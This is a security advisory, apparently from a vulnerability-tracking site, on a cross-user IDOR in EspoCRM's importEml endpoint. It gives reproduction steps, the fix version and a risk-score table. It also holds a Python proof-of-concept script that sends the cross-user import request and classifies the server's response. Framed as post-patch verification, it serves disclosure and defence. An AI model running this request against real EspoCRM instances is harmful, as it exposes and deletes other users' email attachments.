EspoCRM Insecure Direct Object Reference Vulnerability in Email Attachment Import Endpoint

Vulnerability

A cross-user Insecure Direct Object Reference (IDOR) vulnerability affects EspoCRM versions through 9.3.3. The POST /api/v1/Email/importEml endpoint takes an attacker-supplied fileId parameter and uses it to fetch an attachment record without checking that the requesting user is permitted to read that attachment. An authenticated user who holds the Email:create and Import permissions can therefore import another user's .eml attachment into their own mailbox, and the import also removes the victim's original attachment record. The missing authorization check is the root cause; exploitation is straightforward because attachment IDs are routinely exposed in the application's user interface and in API responses.

Impact

Exploitation gives the attacker unauthorized read access to the contents of another user's email attachment: the imported .eml is used to create a new email in the attacker's mailbox. Because the import also deletes the original attachment, the victim loses the data, so the flaw harms both the confidentiality and the integrity of the victim's records.

Reproduction

To reproduce, log in as a user who holds the permissions required to import emails (Email:create and Import) but who does not have read access to all attachments. Have another user (the victim) upload a .eml file as a Note attachment, and obtain the resulting attachment fileId, which is visible in the application's interface and API responses. Then, as the first user, send a POST request to the importEml endpoint with that fileId. On an affected version the request succeeds: the victim's email is imported into the attacker's mailbox, its contents become readable to the attacker, and the original attachment is deleted from the victim's account. On a fixed version the request is denied.
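The following script turns the reproduction steps above into a repeatable post-patch check. It is an added example, not code from this advisory or from the EspoCRM project. It takes from the advisory only the endpoint (POST /api/v1/Email/importEml) and the JSON parameter fileId; HTTP Basic authentication against /api/v1 is EspoCRM's documented API login method, while the verdict assigned to each HTTP status code, the helper names and the test-account setup are assumptions. Because a successful import deletes the referenced attachment, point it only at a throwaway .eml uploaded by a test account you control.

```python
"""
Post-patch verification for the cross-user importEml IDOR.

Added example, not code from the advisory or from EspoCRM. Only the endpoint
path and the fileId parameter come from the advisory; Basic auth against
/api/v1 is EspoCRM's documented API login. The status-code mapping in
classify() is an assumption about how an affected vs. fixed server answers.

WARNING: a successful import deletes the referenced attachment. Use a
disposable .eml uploaded by a test "victim" account, never real user data.
"""
import base64
import json
import sys
import urllib.error
import urllib.request
from typing import Callable, Tuple

IMPORT_EML_PATH = "/api/v1/Email/importEml"


def basic_auth_header(username: str, password: str) -> str:
    """Authorization header value for EspoCRM's HTTP Basic API authentication."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"


def build_import_request(base_url: str, file_id: str,
                         username: str, password: str) -> urllib.request.Request:
    """POST {"fileId": ...} to importEml as the low-privileged (attacker) user."""
    url = base_url.rstrip("/") + IMPORT_EML_PATH
    body = json.dumps({"fileId": file_id}).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", "application/json")
    req.add_header("Authorization", basic_auth_header(username, password))
    return req


def classify(status: int) -> str:
    """Map the HTTP status of the import attempt to a verdict (assumed mapping)."""
    if 200 <= status < 300:
        # The server accepted a fileId owned by another user: the IDOR is present.
        return "VULNERABLE"
    if status == 403:
        # The authorization check rejected the foreign attachment (expected once fixed).
        return "DENIED"
    if status == 401:
        # Credentials for the attacker account were not accepted.
        return "AUTH_FAILED"
    if status == 404:
        # Either a wrong fileId, or a server that hides records the user cannot read.
        return "NOT_FOUND"
    return "INCONCLUSIVE"


def send_with_urllib(req: urllib.request.Request) -> int:
    """Default transport: perform the request and return only the HTTP status."""
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def check_import_eml(base_url: str, file_id: str, username: str, password: str,
                     send: Callable[[urllib.request.Request], int] = send_with_urllib
                     ) -> Tuple[int, str]:
    """Attempt the cross-user import and return (http_status, verdict).

    `send` is injectable so the verdict logic can be exercised offline.
    """
    req = build_import_request(base_url, file_id, username, password)
    status = send(req)
    return status, classify(status)


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit("usage: check_import_eml.py BASE_URL VICTIM_FILE_ID ATTACKER_USER ATTACKER_PASS")
    code, verdict = check_import_eml(*sys.argv[1:])
    print(f"HTTP {code}: {verdict}")
```

Setup for a real run: create two test accounts, give the "attacker" account Email:create and Import but no read access to the "victim" account's attachments, upload a throwaway .eml as a Note attachment while logged in as the victim, copy its attachment id from the UI or API response, and run the script with the attacker's credentials. A 2xx answer means the instance still imports (and deletes) another user's attachment; a 403 is the behaviour expected after upgrading to 9.3.4.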

Remediation

Users are advised to update to EspoCRM version 9.3.4, where this vulnerability has been fixed. Until the upgrade is applied, restricting the Import permission to trusted roles reduces the set of users who can reach the affected endpoint, since the attack requires that permission together with Email:create.

Added: Apr 13, 2026, 9:38 PM
Updated: Apr 13, 2026, 9:38 PM

Vulnerability Rating

Custom Algorithm

spread          3.1
impact          1.3
exploitability  6.6
remediation     7.7
relevance       5.8
threat          6.4
urgency         2.9
incentive       0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.